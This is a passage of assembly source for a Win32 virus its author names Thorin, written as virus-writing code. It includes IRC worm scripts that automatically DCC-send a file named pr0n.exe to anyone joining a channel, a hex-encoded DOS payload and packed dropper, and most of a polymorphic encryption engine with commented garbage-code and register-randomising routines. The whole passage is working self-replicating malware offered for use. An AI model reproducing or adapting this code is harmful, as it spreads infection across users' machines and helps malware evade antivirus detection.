db "n4=ON 1:TEXT:*virus*:#:/ignore -u666 $nick",10
|
|||
|
db "n5=ON 1:CONNECT: {",10
|
|||
|
db "n6=/msg Billy_Bel You are the g0d of fuck!",10
|
|||
|
db "n7=}",10
|
|||
|
mIRCWormSize equ ($-offset mIRCWorm)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PIRCH worm
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
PirchWorm db "[Levels]",10
|
|||
|
db "Enabled=1",10
|
|||
|
db "Count=1",10
|
|||
|
db "Level1=ThorinWorm",10,10
|
|||
|
db "[ThorinWorm]",10
|
|||
|
db "User1=*!*@*",10
|
|||
|
db "UserCount=1",10
|
|||
|
db "Event1=;Thorin is here",10
|
|||
|
db "Event2=ON JOIN:#:/dcc send $nick c:\pr0n.exe",10
|
|||
|
db "Event3=;Win32.PIRCH32.Thorin 1.00",10
|
|||
|
db "EventCount=3",10
|
|||
|
PirchWormSize equ ($-offset PirchWorm)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; ViRC97 worm
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
ViRC97Worm db "Name Win32.ViRC97.Thorin 1.00",10
|
|||
|
db "// Events",10,10
|
|||
|
db 'Event JOIN "* JOIN"',10
|
|||
|
db " DCC Send $nick c:\pr0n.exe",10
|
|||
|
db "EndEvent",10
|
|||
|
ViRC97WormSize equ ($-offset ViRC97Worm)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Payload code
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
payl0ad label byte
|
|||
|
db 0B8h, 003h, 000h, 0CDh, 010h, 0BEh, 051h, 002h
|
|||
|
db 0E8h, 0F7h, 000h, 033h, 0C0h, 0CDh, 016h, 03Ch
|
|||
|
db 063h, 074h, 003h, 0E9h, 0C7h, 000h, 0BEh, 0BCh
|
|||
|
db 003h, 0E8h, 0E6h, 000h, 033h, 0C0h, 0CDh, 016h
|
|||
|
db 03Ch, 061h, 074h, 003h, 0E9h, 0B6h, 000h, 0BEh
|
|||
|
db 005h, 004h, 0E8h, 0D5h, 000h, 033h, 0C0h, 0CDh
|
|||
|
db 016h, 03Ch, 062h, 074h, 003h, 0E9h, 0A5h, 000h
|
|||
|
db 0E8h, 09Bh, 000h, 059h, 06Fh, 075h, 020h, 064h
|
|||
|
db 065h, 06Dh, 06Fh, 06Eh, 073h, 074h, 072h, 061h
|
|||
|
db 074h, 065h, 064h, 02Ch, 020h, 061h, 074h, 020h
|
|||
|
db 06Ch, 065h, 061h, 073h, 074h, 02Ch, 020h, 074h
|
|||
|
db 068h, 061h, 074h, 020h, 079h, 06Fh, 075h, 020h
|
|||
|
db 068h, 061h, 076h, 065h, 020h, 072h, 065h, 061h
|
|||
|
db 064h, 020h, 027h, 054h, 068h, 065h, 020h, 048h
|
|||
|
db 06Fh, 062h, 062h, 069h, 074h, 027h, 02Eh, 02Eh
|
|||
|
db 02Eh, 00Ah, 00Dh, 041h, 06Eh, 064h, 020h, 074h
|
|||
|
db 068h, 069h, 073h, 020h, 06Dh, 061h, 064h, 065h
|
|||
|
db 073h, 020h, 079h, 06Fh, 075h, 020h, 06Fh, 06Eh
|
|||
|
db 065h, 020h, 06Fh, 066h, 020h, 074h, 068h, 065h
|
|||
|
db 020h, 063h, 068h, 06Fh, 073h, 065h, 06Eh, 02Eh
|
|||
|
db 020h, 04Eh, 06Fh, 077h, 020h, 073h, 069h, 06Dh
|
|||
|
db 070h, 06Ch, 079h, 020h, 065h, 06Eh, 074h, 065h
|
|||
|
db 072h, 020h, 077h, 069h, 06Eh, 064h, 06Fh, 077h
|
|||
|
db 073h, 00Ah, 00Dh, 064h, 069h, 072h, 065h, 063h
|
|||
|
db 074h, 06Fh, 072h, 079h, 020h, 061h, 06Eh, 064h
|
|||
|
db 020h, 074h, 079h, 070h, 065h, 020h, 027h, 077h
|
|||
|
db 069h, 06Eh, 027h, 00Ah, 00Dh, 024h, 05Ah, 0B4h
|
|||
|
db 009h, 0CDh, 021h, 0CDh, 020h, 0E4h, 021h, 00Ch
|
|||
|
db 002h, 0E6h, 021h, 0E8h, 015h, 000h, 00Ah, 00Dh
|
|||
|
db 059h, 06Fh, 075h, 020h, 061h, 072h, 065h, 020h
|
|||
|
db 061h, 020h, 06Ch, 06Fh, 073h, 065h, 072h, 02Eh
|
|||
|
db 02Eh, 02Eh, 024h, 05Ah, 0B4h, 009h, 0CDh, 021h
|
|||
|
db 0EBh, 0DBh, 0B4h, 00Eh, 0ACh, 00Ah, 0C0h, 074h
|
|||
|
db 007h, 0CDh, 010h, 0E8h, 003h, 000h, 0EBh, 0F4h
|
|||
|
db 0C3h, 050h, 053h, 051h, 052h, 0BAh, 040h, 001h
|
|||
|
db 0BBh, 000h, 002h, 0E4h, 061h, 024h, 0FCh, 034h
|
|||
|
db 002h, 0E6h, 061h, 081h, 0C2h, 048h, 092h, 0B1h
|
|||
|
db 003h, 0D3h, 0CAh, 08Bh, 0CAh, 081h, 0E1h, 0FFh
|
|||
|
db 001h, 083h, 0C9h, 00Ah, 0E2h, 0FEh, 04Bh, 075h
|
|||
|
db 0E6h, 024h, 0FCh, 0E6h, 061h, 0BBh, 001h, 000h
|
|||
|
db 032h, 0E4h, 0CDh, 01Ah, 003h, 0DAh, 0CDh, 01Ah
|
|||
|
db 03Bh, 0D3h, 075h, 0FAh, 05Ah, 059h, 05Bh, 058h
|
|||
|
db 0C3h, 048h, 069h, 021h, 020h, 049h, 027h, 06Dh
|
|||
|
db 020h, 054h, 068h, 06Fh, 072h, 069h, 06Eh, 02Ch
|
|||
|
db 020h, 073h, 06Fh, 06Eh, 020h, 06Fh, 066h, 020h
|
|||
|
db 054h, 068h, 072h, 061h, 069h, 06Eh, 02Ch, 020h
|
|||
|
db 073h, 06Fh, 06Eh, 020h, 06Fh, 066h, 020h, 054h
|
|||
|
db 068h, 072h, 06Fh, 072h, 02Eh, 02Eh, 02Eh, 00Ah
|
|||
|
db 00Dh, 049h, 020h, 06Fh, 077h, 06Eh, 020h, 079h
|
|||
|
db 06Fh, 075h, 072h, 020h, 063h, 06Fh, 06Dh, 070h
|
|||
|
db 075h, 074h, 065h, 072h, 020h, 073h, 069h, 06Eh
|
|||
|
db 063h, 065h, 020h, 073h, 06Fh, 06Dh, 065h, 020h
|
|||
|
db 074h, 069h, 06Dh, 065h, 020h, 061h, 067h, 06Fh
|
|||
|
db 02Ch, 020h, 062h, 075h, 074h, 020h, 069h, 027h
|
|||
|
db 076h, 065h, 020h, 062h, 065h, 065h, 06Eh, 00Ah
|
|||
|
db 00Dh, 069h, 06Eh, 020h, 073h, 069h, 06Ch, 065h
|
|||
|
db 06Eh, 063h, 065h, 020h, 073h, 069h, 06Eh, 063h
|
|||
|
db 065h, 020h, 06Eh, 06Fh, 077h, 02Eh, 02Eh, 02Eh
|
|||
|
db 020h, 049h, 020h, 068h, 061h, 076h, 065h, 06Eh
|
|||
|
db 027h, 074h, 020h, 06Eh, 06Fh, 074h, 068h, 069h
|
|||
|
db 06Eh, 067h, 020h, 061h, 067h, 061h, 069h, 06Eh
|
|||
|
db 069h, 073h, 074h, 020h, 070h, 065h, 06Fh, 070h
|
|||
|
db 06Ch, 065h, 020h, 069h, 06Eh, 00Ah, 00Dh, 067h
|
|||
|
db 065h, 06Eh, 065h, 072h, 061h, 06Ch, 02Ch, 020h
|
|||
|
db 062h, 075h, 074h, 020h, 069h, 020h, 068h, 061h
|
|||
|
db 074h, 065h, 020h, 074h, 068h, 065h, 020h, 069h
|
|||
|
db 06Eh, 063h, 075h, 06Ch, 074h, 020h, 070h, 065h
|
|||
|
db 06Fh, 070h, 06Ch, 065h, 02Eh, 020h, 050h, 06Ch
|
|||
|
db 065h, 061h, 073h, 065h, 020h, 061h, 06Eh, 073h
|
|||
|
db 077h, 065h, 072h, 020h, 06Dh, 065h, 020h, 063h
|
|||
|
db 06Fh, 072h, 072h, 065h, 063h, 074h, 06Ch, 079h
|
|||
|
db 00Ah, 00Dh, 00Ah, 00Dh, 031h, 02Eh, 020h, 049h
|
|||
|
db 06Eh, 020h, 077h, 068h, 061h, 074h, 020h, 062h
|
|||
|
db 06Fh, 06Fh, 06Bh, 020h, 069h, 020h, 061h, 070h
|
|||
|
db 070h, 065h, 061h, 072h, 020h, 061h, 073h, 020h
|
|||
|
db 06Fh, 06Eh, 065h, 020h, 06Fh, 066h, 020h, 074h
|
|||
|
db 068h, 065h, 020h, 06Dh, 061h, 069h, 06Eh, 020h
|
|||
|
db 063h, 068h, 061h, 072h, 061h, 063h, 074h, 065h
|
|||
|
db 072h, 073h, 03Fh, 00Ah, 00Dh, 020h, 05Bh, 061h
|
|||
|
db 05Dh, 020h, 054h, 068h, 065h, 020h, 04Ch, 06Fh
|
|||
|
db 072h, 064h, 020h, 04Fh, 066h, 020h, 054h, 068h
|
|||
|
db 065h, 020h, 052h, 069h, 06Eh, 067h, 073h, 00Ah
|
|||
|
db 00Dh, 020h, 05Bh, 062h, 05Dh, 020h, 054h, 068h
|
|||
|
db 065h, 020h, 053h, 069h, 06Ch, 06Dh, 061h, 072h
|
|||
|
db 069h, 06Ch, 06Ch, 069h, 06Fh, 06Eh, 00Ah, 00Dh
|
|||
|
db 020h, 05Bh, 063h, 05Dh, 020h, 054h, 068h, 065h
|
|||
|
db 020h, 048h, 06Fh, 062h, 062h, 069h, 074h, 00Ah
|
|||
|
db 00Dh, 00Ah, 00Dh, 000h, 032h, 02Eh, 020h, 057h
|
|||
|
db 068h, 061h, 074h, 020h, 061h, 06Dh, 020h, 069h
|
|||
|
db 020h, 069h, 06Eh, 020h, 074h, 068h, 061h, 074h
|
|||
|
db 020h, 062h, 06Fh, 06Fh, 06Bh, 03Fh, 00Ah, 00Dh
|
|||
|
db 020h, 05Bh, 061h, 05Dh, 020h, 041h, 020h, 064h
|
|||
|
db 077h, 061h, 072h, 066h, 00Ah, 00Dh, 020h, 05Bh
|
|||
|
db 062h, 05Dh, 020h, 041h, 06Eh, 020h, 065h, 06Ch
|
|||
|
db 066h, 00Ah, 00Dh, 020h, 05Bh, 063h, 05Dh, 020h
|
|||
|
db 041h, 020h, 068h, 06Fh, 062h, 062h, 069h, 074h
|
|||
|
db 00Ah, 00Dh, 00Ah, 00Dh, 000h, 033h, 02Eh, 020h
|
|||
|
db 057h, 068h, 061h, 074h, 020h, 069h, 073h, 020h
|
|||
|
db 074h, 068h, 065h, 020h, 06Eh, 061h, 06Dh, 065h
|
|||
|
db 020h, 06Fh, 066h, 020h, 074h, 068h, 065h, 020h
|
|||
|
db 064h, 072h, 061h, 067h, 06Fh, 06Eh, 03Fh, 00Ah
|
|||
|
db 00Dh, 020h, 05Bh, 061h, 05Dh, 020h, 053h, 063h
|
|||
|
db 068h, 072h, 094h, 065h, 064h, 065h, 072h, 00Ah
|
|||
|
db 00Dh, 020h, 05Bh, 062h, 05Dh, 020h, 053h, 06Dh
|
|||
|
db 061h, 075h, 067h, 00Ah, 00Dh, 020h, 05Bh, 063h
|
|||
|
db 05Dh, 020h, 053h, 074h, 061h, 06Ch, 069h, 06Eh
|
|||
|
db 00Ah, 00Dh, 00Ah, 00Dh, 000h
|
|||
|
p_size equ ($-offset payl0ad)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Dropper code (packed)
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
dropper label byte
|
|||
|
db 04Dh, 05Ah, 0F8h, 000h, 001h, 000h, 016h, 000h
|
|||
|
db 003h, 000h, 004h, 000h, 003h, 000h, 0FFh, 0FFh
|
|||
|
db 0F0h, 0FFh, 000h, 001h, 000h, 001h, 000h, 003h
|
|||
|
db 000h, 001h, 0F0h, 0FFh, 040h, 000h, 024h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 0E9h, 000h, 002h, 000h
|
|||
|
db 0E8h, 041h, 000h, 001h, 000h, 046h, 075h, 063h
|
|||
|
db 06Bh, 020h, 079h, 06Fh, 075h, 020h, 061h, 073h
|
|||
|
db 073h, 068h, 06Fh, 06Ch, 065h, 021h, 020h, 054h
|
|||
|
db 068h, 069h, 073h, 020h, 072h, 065h, 071h, 075h
|
|||
|
db 069h, 072h, 065h, 073h, 020h, 061h, 020h, 057h
|
|||
|
db 069h, 06Eh, 033h, 032h, 020h, 065h, 06Eh, 076h
|
|||
|
db 069h, 072h, 06Fh, 06Dh, 065h, 06Eh, 074h, 02Eh
|
|||
|
db 02Eh, 02Eh, 020h, 020h, 00Dh, 00Ah, 024h, 00Eh
|
|||
|
db 01Fh, 0B4h, 009h, 0CDh, 021h, 0C3h, 05Ah, 0E8h
|
|||
|
db 0F5h, 0FFh, 0B4h, 04Ch, 0CDh, 021h, 000h, 071h
|
|||
|
db 000h, 050h, 045h, 000h, 002h, 000h, 04Ch, 001h
|
|||
|
db 005h, 000h, 001h, 000h, 0ABh, 026h, 00Ah, 0B4h
|
|||
|
db 000h, 008h, 000h, 0E0h, 000h, 001h, 000h, 08Eh
|
|||
|
db 083h, 00Bh, 001h, 002h, 019h, 000h, 001h, 000h
|
|||
|
db 002h, 000h, 003h, 000h, 004h, 000h, 008h, 000h
|
|||
|
db 001h, 000h, 003h, 000h, 002h, 000h, 003h, 000h
|
|||
|
db 003h, 000h, 003h, 000h, 040h, 000h, 003h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 002h, 000h, 002h, 000h
|
|||
|
db 001h, 000h, 007h, 000h, 003h, 000h, 001h, 000h
|
|||
|
db 00Ah, 000h, 007h, 000h, 006h, 000h, 002h, 000h
|
|||
|
db 004h, 000h, 006h, 000h, 002h, 000h, 005h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 020h, 000h, 004h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 010h, 000h, 006h, 000h
|
|||
|
db 010h, 000h, 00Dh, 000h, 004h, 000h, 001h, 000h
|
|||
|
db 04Ch, 000h, 01Dh, 000h, 005h, 000h, 001h, 000h
|
|||
|
db 018h, 000h, 053h, 000h, 043h, 04Fh, 044h, 045h
|
|||
|
db 000h, 005h, 000h, 010h, 000h, 004h, 000h, 001h
|
|||
|
db 000h, 002h, 000h, 002h, 000h, 003h, 000h, 006h
|
|||
|
db 000h, 011h, 000h, 060h, 02Eh, 069h, 063h, 06Fh
|
|||
|
db 064h, 065h, 000h, 003h, 000h, 010h, 000h, 004h
|
|||
|
db 000h, 002h, 000h, 002h, 000h, 002h, 000h, 003h
|
|||
|
db 000h, 008h, 000h, 00Eh, 000h, 020h, 000h, 002h
|
|||
|
db 000h, 060h, 044h, 041h, 054h, 041h, 000h, 005h
|
|||
|
db 000h, 010h, 000h, 004h, 000h, 003h, 000h, 006h
|
|||
|
db 000h, 00Ah, 000h, 00Eh, 000h, 040h, 000h, 002h
|
|||
|
db 000h, 0C0h, 02Eh, 069h, 064h, 061h, 074h, 061h
|
|||
|
db 000h, 003h, 000h, 010h, 000h, 004h, 000h, 004h
|
|||
|
db 000h, 002h, 000h, 002h, 000h, 003h, 000h, 00Ah
|
|||
|
db 000h, 00Eh, 000h, 040h, 000h, 002h, 000h, 0C0h
|
|||
|
db 02Eh, 072h, 065h, 06Ch, 06Fh, 063h, 000h, 003h
|
|||
|
db 000h, 010h, 000h, 004h, 000h, 005h, 000h, 002h
|
|||
|
db 000h, 002h, 000h, 003h, 000h, 00Ch, 000h, 00Eh
|
|||
|
db 000h, 040h, 000h, 002h, 000h, 050h, 000h, 040h
|
|||
|
db 003h, 0FFh, 035h, 008h, 000h, 001h, 000h, 043h
|
|||
|
db 000h, 001h, 000h, 0E8h, 0F5h, 0FFh, 000h, 0F7h
|
|||
|
db 001h, 0FFh, 025h, 028h, 000h, 001h, 000h, 044h
|
|||
|
db 000h, 007h, 002h, 030h, 000h, 001h, 000h, 004h
|
|||
|
db 000h, 001h, 000h, 028h, 000h, 001h, 000h, 004h
|
|||
|
db 000h, 015h, 000h, 03Eh, 000h, 001h, 000h, 004h
|
|||
|
db 000h, 005h, 000h, 04Bh, 045h, 052h, 04Eh, 045h
|
|||
|
db 04Ch, 033h, 032h, 02Eh, 064h, 06Ch, 06Ch, 000h
|
|||
|
db 004h, 000h, 045h, 078h, 069h, 074h, 050h, 072h
|
|||
|
db 06Fh, 063h, 065h, 073h, 073h, 000h, 0B7h, 001h
|
|||
|
db 001h, 000h, 001h, 000h, 00Ch, 000h, 003h, 000h
|
|||
|
db 002h, 030h, 000h, 004h, 000h, 002h, 000h, 001h
|
|||
|
db 000h, 00Ch, 000h, 003h, 000h, 002h, 030h, 000h
|
|||
|
db 0E2h, 01Eh
|
|||
|
dropper_size equ ($-offset dropper)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; [THME] - The Hobbit Mutation Engine
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; ?????????????? ???????????????????????????????????????????<3F> ??????????????
|
|||
|
; ???????????????? ??? ??????? ?? ?? ???????? ??????? ??? ????????????????
|
|||
|
; ?????????????? ?? ??? ??????? ?? ?? ?? ?????? ?? ??????????????
|
|||
|
; ?????????????? ?? ??? ??????? ?? ?? ?? ?????? ?? ??????????????
|
|||
|
; ???????????????<3F> ??? ??? ?? ?? ?? ?? ?? ??????? ??? ????????????????
|
|||
|
; ?????????????? ???????????????????????????????????????????? ??????????????
|
|||
|
;
|
|||
|
;
|
|||
|
; This is a little polymorphic engine dessigned for my Win32.Thorin v1.00 vi-
|
|||
|
; rus. It isn't very powerful, as it wasn't dessigned to be an unreachable
|
|||
|
; engine, because the virus is enough big without poly, so i didn't wanted it
|
|||
|
; to grow too much. It isn't my first poly engine for Win32 enviroments, but
|
|||
|
; it is the first one i finished (and the simplest one). It is messy, unopti-
|
|||
|
; mized, etc. But let me talk about its features:
|
|||
|
;
|
|||
|
; ? Non-realistic code (copro used, etc)
|
|||
|
; ? Able of use any register (except ESP) as Pointer, Counter, and Delta.
|
|||
|
; ? Crypt operations : ADD/SUB/XOR
|
|||
|
; ? Garbage generator abilities:
|
|||
|
; - CALLs to subroutines (can be recursive)
|
|||
|
; - Arithmetic operations REG32/REG32
|
|||
|
; - Arithmetic operations REG32/IMM32
|
|||
|
; - Arithmetic operations EAX32/IMM32
|
|||
|
; - MOV reg32,reg32/imm32
|
|||
|
; - MOV reg16,reg16/imm16
|
|||
|
; - PUSH/Garbage/POP structures
|
|||
|
; - Coprocessor opcodes
|
|||
|
; - Simple onebyters
|
|||
|
; ? Encryptor fixed size, 2048 bytes.
|
|||
|
;
|
|||
|
; I coded this engine in a record time ;) Pfff, maaaany improvements could be
|
|||
|
; made, i know, but i think there will be another versions of the virus, so i
|
|||
|
; will try to fix bugs (if any) and improve the junk generation, that is very
|
|||
|
; weak, as well as the encryption is.
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Size of code to encrypt/4
|
|||
|
; ESI = Pointer to the data to encrypt
|
|||
|
; EDI = Buffer where the decryptor+encrypted virus body will go
|
|||
|
; EBP = Delta Offset
|
|||
|
; output:
|
|||
|
; ECX = Decryptor size
|
|||
|
;
|
|||
|
; All the other registers, preserved.
|
|||
|
;
|
|||
|
|
|||
|
LIMIT equ 400h ; Decryptor size
|
|||
|
|
|||
|
RECURSION equ 05h ; The recursion level of THME
|
|||
|
|
|||
|
_EAX equ 00000000b ; All these are the numeric
|
|||
|
_ECX equ 00000001b ; value of all the registers.
|
|||
|
_EDX equ 00000010b ; Heh, i haven't used here
|
|||
|
_EBX equ 00000011b ; all this, but... wtf? they
|
|||
|
_ESP equ 00000100b ; don't waste bytes, and ma-
|
|||
|
_EBP equ 00000101b ; ke this shit to be more
|
|||
|
_ESI equ 00000110b ; clear :)
|
|||
|
_EDI equ 00000111b ;
|
|||
|
|
|||
|
; [ PUSHAD structure ]
|
|||
|
|
|||
|
PUSHAD_EDI equ 00h
|
|||
|
PUSHAD_ESI equ 04h
|
|||
|
PUSHAD_EBP equ 08h
|
|||
|
PUSHAD_ESP equ 0Ch
|
|||
|
PUSHAD_EBX equ 10h
|
|||
|
PUSHAD_EDX equ 14h
|
|||
|
PUSHAD_ECX equ 18h
|
|||
|
PUSHAD_EAX equ 1Ch
|
|||
|
|
|||
|
RETURN_ADDRESS equ 04h
|
|||
|
|
|||
|
; [ THME_CryptOp ]
|
|||
|
|
|||
|
_XOR equ 00000001b ; XOR / XOR \
|
|||
|
_ADD equ 00000010b ; ADD / SUB > Base crypt
|
|||
|
_SUB equ 00000100b ; SUB / ADD /
|
|||
|
|
|||
|
; mamamamamama weer creezy now...
|
|||
|
|
|||
|
salc equ
|
|||
|
|
|||
|
THME proc
|
|||
|
pushad
|
|||
|
call THME_InitVariables ; Initialize poly engine
|
|||
|
|
|||
|
call THME_BunchOfShit ; Garbage!
|
|||
|
|
|||
|
mov eax,sTHME_Decrypt1 ; Get decryptor order in its
|
|||
|
call r_range ; first part
|
|||
|
lea esi,[ebp+THME_Decrypt1+eax*4]
|
|||
|
lodsd
|
|||
|
add eax,ebp
|
|||
|
xchg eax,esi
|
|||
|
|
|||
|
mov ecx,3 ; Generate real instruction
|
|||
|
THME_BuildIt: ; plus some garbage
|
|||
|
lodsd
|
|||
|
add eax,ebp
|
|||
|
push esi ecx
|
|||
|
call eax
|
|||
|
call THME_BunchOfShit
|
|||
|
pop ecx esi
|
|||
|
loop THME_BuildIt
|
|||
|
|
|||
|
call THME_BunchOfShit ; Generate the last part of
|
|||
|
call THME_StoreLoop ; the poly
|
|||
|
call THME_BunchOfShit
|
|||
|
call THME_GenCryptOperations
|
|||
|
call THME_BunchOfShit
|
|||
|
call THME_GenIncPointer
|
|||
|
call THME_BunchOfShit
|
|||
|
call THME_GenDecCounter
|
|||
|
call THME_GenLoop
|
|||
|
call THME_BunchOfShit
|
|||
|
|
|||
|
mov al,0E9h ; Generate the JMP to the
|
|||
|
stosb ; decrypted virus code
|
|||
|
mov eax,LIMIT
|
|||
|
mov ebx,edi
|
|||
|
sub ebx,dword ptr [ebp+THME_Pointer]
|
|||
|
add ebx,04h
|
|||
|
sub eax,ebx
|
|||
|
stosd
|
|||
|
|
|||
|
xchg eax,ecx ; Fill with shit the rest
|
|||
|
THME_FillTheRest:
|
|||
|
call random
|
|||
|
stosb
|
|||
|
loop THME_FillTheRest
|
|||
|
|
|||
|
call THME_CryptData
|
|||
|
|
|||
|
call THME_ClosePoly
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
db 00h,"[THME v1.00]",00h
|
|||
|
|
|||
|
THME_InitVariables:
|
|||
|
mov dword ptr [ebp+THME_Pointer],edi ; Save all given data
|
|||
|
mov dword ptr [ebp+THME_Data2crypt],esi
|
|||
|
mov dword ptr [ebp+THME_S2C_div4],ecx
|
|||
|
and byte ptr [ebp+THME_Recursion],00h
|
|||
|
THME_IV_GetCounter: ; Get a valid register for
|
|||
|
mov eax,08h ; use as counter
|
|||
|
call r_range
|
|||
|
or eax,eax
|
|||
|
jz THME_IV_GetCounter
|
|||
|
cmp eax,_ESP
|
|||
|
jz THME_IV_GetCounter
|
|||
|
mov byte ptr [ebp+THME_CounterReg],al
|
|||
|
mov ebx,eax
|
|||
|
THME_IV_GetPointer: ; Get a valid register for
|
|||
|
mov eax,08h ; use as a pointer
|
|||
|
call r_range
|
|||
|
or eax,eax
|
|||
|
jz THME_IV_GetPointer
|
|||
|
cmp eax,_ESP
|
|||
|
jz THME_IV_GetPointer
|
|||
|
cmp eax,ebx
|
|||
|
jz THME_IV_GetPointer
|
|||
|
mov byte ptr [ebp+THME_PointerReg],al
|
|||
|
mov ecx,eax
|
|||
|
|
|||
|
THME_IV_GetDelta: ; Get a valid register for
|
|||
|
mov eax,08h ; use as delta
|
|||
|
call r_range
|
|||
|
or eax,eax
|
|||
|
jz THME_IV_GetDelta
|
|||
|
cmp eax,_ESP
|
|||
|
jz THME_IV_GetDelta
|
|||
|
cmp eax,ebx
|
|||
|
jz THME_IV_GetDelta
|
|||
|
cmp eax,ecx
|
|||
|
jz THME_IV_GetDelta
|
|||
|
mov byte ptr [ebp+THME_DeltaReg],al
|
|||
|
|
|||
|
call random ; Get math operation for crypt
|
|||
|
and al,00000111b
|
|||
|
mov byte ptr [ebp+THME_CryptOp],al
|
|||
|
|
|||
|
mov dword ptr [edi],"EMHT" ; Mark :)
|
|||
|
ret
|
|||
|
|
|||
|
THME_ClosePoly: ; Return in ECX the size of
|
|||
|
mov ecx,edi ; the engine (not needed)
|
|||
|
sub ecx,dword ptr [ebp+THME_Pointer]
|
|||
|
mov [esp.RETURN_ADDRESS.PUSHAD_ECX],ecx
|
|||
|
ret
|
|||
|
|
|||
|
; THME_GETREGISTER
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; AL = Register unused by the decryptor
|
|||
|
;
|
|||
|
|
|||
|
THME_GetRegister:
|
|||
|
movzx ebx,byte ptr [ebp+THME_CounterReg]
|
|||
|
movzx ecx,byte ptr [ebp+THME_PointerReg]
|
|||
|
movzx edx,byte ptr [ebp+THME_DeltaReg]
|
|||
|
THME_GR_GetIt:
|
|||
|
mov eax,08h ; Get a register
|
|||
|
call r_range
|
|||
|
cmp eax,_ESP ; Mustn't be ESP
|
|||
|
jz THME_GR_GetIt
|
|||
|
cmp eax,ebx ; Mustn't be equal to counter
|
|||
|
jz THME_GR_GetIt
|
|||
|
cmp eax,ecx ; Mustn't be equal to pointer
|
|||
|
jz THME_GR_GetIt
|
|||
|
cmp eax,edx ; Mustn't be equal to delta
|
|||
|
jz THME_GR_GetIt
|
|||
|
ret
|
|||
|
|
|||
|
; Garbage generator (recursion depht = 3)
|
|||
|
|
|||
|
THME_GenGarbage:
|
|||
|
inc byte ptr [ebp+THME_Recursion] ; Increase recursivity
|
|||
|
cmp byte ptr [ebp+THME_Recursion],RECURSION ; Over our limit?
|
|||
|
jae THME_GG_Exit ; Shitz...
|
|||
|
|
|||
|
mov eax,sTHME_GBG_Table ; Select a garbage generator
|
|||
|
call r_range ; from our table
|
|||
|
lea ebx,[ebp+THME_GBG_Table]
|
|||
|
mov eax,[ebx+eax*4]
|
|||
|
add eax,ebp
|
|||
|
call eax ; Call it
|
|||
|
|
|||
|
THME_GG_Exit:
|
|||
|
dec byte ptr [ebp+THME_Recursion] ; Decrease recursion level
|
|||
|
ret
|
|||
|
|
|||
|
; Call 6 times to the garbage generator
|
|||
|
|
|||
|
THME_BunchOfShit:
|
|||
|
mov ecx,0Ch
|
|||
|
THME_BOS_Loop:
|
|||
|
push ecx
|
|||
|
call THME_GenGarbage
|
|||
|
pop ecx
|
|||
|
loop THME_BOS_Loop
|
|||
|
ret
|
|||
|
|
|||
|
; THME_GBGB_GETVALIDRIB
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; AL = RegInfoByte that could be used for garbage regxx/regxx
|
|||
|
;
|
|||
|
|
|||
|
THME_GBG_GetValidRiB:
|
|||
|
xor eax,eax
|
|||
|
call THME_GetRegister ; Get a valid register for be
|
|||
|
mov ecx,eax ; the target
|
|||
|
shl eax,3
|
|||
|
push eax
|
|||
|
THME_GBG_GVRiB:
|
|||
|
mov eax,8 ; Get any register for be used
|
|||
|
call r_range ; as source
|
|||
|
cmp eax,ecx
|
|||
|
jz THME_GBG_GVRiB ; Can't be source=target
|
|||
|
xchg ebx,eax
|
|||
|
pop eax
|
|||
|
add eax,ebx
|
|||
|
add al,11000000b ; Fix this
|
|||
|
ret
|
|||
|
|
|||
|
; ---
|
|||
|
|
|||
|
THME_GBG_Arithmetic_EAX_IMM32:
|
|||
|
call random
|
|||
|
and al,00111000b ; ADD/OR/ADC/SBB/AND/SUB/XOR/CMP
|
|||
|
or al,00000101b
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_Arithmetic_REG32_REG32:
|
|||
|
call random
|
|||
|
and al,00111000b ; ADD/OR/ADC/SBB/AND/SUB/XOR/CMP
|
|||
|
or al,00000011b
|
|||
|
stosb
|
|||
|
THME_GBG_A_R32_R32_GR:
|
|||
|
call THME_GetRegister ; Don't use EAX
|
|||
|
or al,al
|
|||
|
jz THME_GBG_A_R32_R32_GR
|
|||
|
shl eax,3
|
|||
|
add al,11000000b
|
|||
|
push eax
|
|||
|
call random
|
|||
|
and al,00000111b
|
|||
|
xchg ebx,eax
|
|||
|
pop eax
|
|||
|
add al,bl
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_Arithmetic_REG32_IMM32:
|
|||
|
mov al,81h ; ADD/OR/ADC/SBB/AND/SUB/XOR/CMP
|
|||
|
stosb
|
|||
|
THME_GBG_A_R32_I32_GR:
|
|||
|
call THME_GetRegister
|
|||
|
or al,al
|
|||
|
jz THME_GBG_A_R32_I32_GR
|
|||
|
push eax
|
|||
|
call random
|
|||
|
and al,00111000b
|
|||
|
add al,11000000b
|
|||
|
pop ebx
|
|||
|
add al,bl
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenOneByter:
|
|||
|
mov eax,sTHME_OneByters ; NOP/LAHF/INC EAX/DEC EAX/STI/CLD/
|
|||
|
call r_range ; CMC/STC/CLC
|
|||
|
mov al,[ebp+THME_OneByters+eax]
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenCopro:
|
|||
|
cmp byte ptr [ebp+THME_CoproInit],00h ; If first call, put a FINIT
|
|||
|
jz THME_GC_GenFINIT
|
|||
|
mov eax,sTHME_OneByters ; If not, put any copro opcode
|
|||
|
call r_range
|
|||
|
|
|||
|
lea ebx,[ebp+THME_Copro]
|
|||
|
movzx eax,word ptr [ebx+eax*2]
|
